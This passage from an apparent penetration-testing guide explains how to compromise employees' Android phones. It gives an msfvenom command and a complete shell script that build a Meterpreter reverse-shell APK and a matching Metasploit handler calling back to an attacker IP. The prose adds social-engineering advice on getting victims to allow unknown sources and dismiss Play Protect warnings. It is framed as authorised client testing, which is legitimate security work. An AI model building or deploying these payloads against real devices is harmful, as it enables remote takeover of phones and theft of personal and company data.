Mobile devices, particularly smartphones and tablets, are an important tool in many organizations. An employee's mobile device can be just as attractive to an attacker as a workstation: it holds sensitive company data alongside private personal data, and it often serves as a second factor for authentication. Therefore, it may be in your interests to test the client's mobile workforce and infrastructure for weaknesses, particularly their susceptibility to malware.

The approach you take will depend heavily on the mobile platform the devices are using. The iOS platform is more locked down and therefore offers fewer opportunities for exploitation. By default, iOS devices can only install apps from the official App Store, which itself applies some measure of review to keep malware out. Nevertheless, malware has made its way onto the App Store on several occasions. Jailbreaking removes the restriction and lets a device install apps from third-party sources, so if a user has jailbroken their device you might be able to use social engineering to get them to install malware.

The Android OS is usually a better bet when it comes to exploiting mobile devices. Android is much less restrictive than iOS by design: granting a single permission (the Install unknown apps setting, which on Android 8 and later is granted per source app such as the browser or file manager) allows the device to install apps from outside Google Play. Rooting reduces the device's security even further. An app that obtains root through the su binary escapes its sandbox and runs with the highest privileges on the device, so it can read other apps' private data, interact with the kernel, and modify the system partition. This can enable you to exfiltrate sensitive data, capture session information, and even leave a device non-functional.

The following example uses a tool called msfvenom, part of the Metasploit Framework, to create a malicious app package for Android devices:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<available port> R > malware.apk

This builds an app package, or APK file, the installation format for Android. The package contains a Meterpreter payload that, when the app is launched, connects back over TCP to the attacker's machine; the listener itself runs on the attack machine, not on the device. The R selects raw output, which for Android payloads is a signed APK, so writing the file with -o malware.apk is equivalent. Before the user can install it, they must allow installation from unknown sources for whatever app opens the file and dismiss the Google Play Protect warning, since Play Protect recognizes unmodified msfvenom payloads; after that they simply need to open the APK to infect their device. Back on the attack machine, start the exploit/multi/handler module with the same payload, LHOST and LPORT. When the victim opens the app, the incoming connection becomes a Meterpreter session from which you can, say, open a shell onto the device.
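The following script ties the two steps together: it generates the msfvenom command and a matching msfconsole resource script for the handler from one set of parameters, so the LHOST and LPORT baked into the APK cannot drift from what the handler listens on (the most common reason a test payload never calls back). This is an added example, not code from the original text or from the Metasploit project; the IP address, port and file names are placeholders, and the APK is only built when msfvenom is actually installed.

```shell
#!/bin/sh
# Added example: build the Android payload and a matching handler from one
# set of parameters. LHOST/LPORT/APK/RC are placeholders, override via env.
set -eu

LHOST="${LHOST:-192.0.2.10}"   # attacker IP (TEST-NET-1 placeholder)
LPORT="${LPORT:-4444}"         # port the handler will listen on
PAYLOAD="android/meterpreter/reverse_tcp"
APK="${APK:-malware.apk}"      # output package
RC="${RC:-handler.rc}"         # msfconsole resource script

# Reject anything that is not a TCP port in 1-65535; a typo here leaves the
# handler listening on a port the payload never connects to.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then return 0; fi
    return 1
}

# The msfvenom invocation. With an android/* payload, -o writes a signed APK,
# which is the same result as the older "R > file.apk" form.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -o %s\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$APK"
}

# Resource script for the listener: same payload, LHOST and LPORT as the APK.
# ExitOnSession false keeps the handler up so several devices can connect.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$PAYLOAD"
    printf 'set LHOST %s\n' "$LHOST"
    printf 'set LPORT %s\n' "$LPORT"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j\n'
}

# Write the handler script and, when Metasploit is installed, build the APK.
build() {
    valid_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; return 1; }
    handler_rc > "$RC"
    if command -v msfvenom >/dev/null 2>&1; then
        sh -c "$(venom_cmd)"
        echo "built $APK; start the listener with: msfconsole -q -r $RC" >&2
    else
        echo "msfvenom not found; would run: $(venom_cmd)" >&2
    fi
}

# Only build when invoked as: sh gen_android_payload.sh run
if [ "${1:-}" = "run" ]; then
    build
fi
```

Start the listener with msfconsole -q -r handler.rc before handing the APK to the target; the -j flag backgrounds the handler so the console stays usable, and each device that opens the app shows up as a separate Meterpreter session.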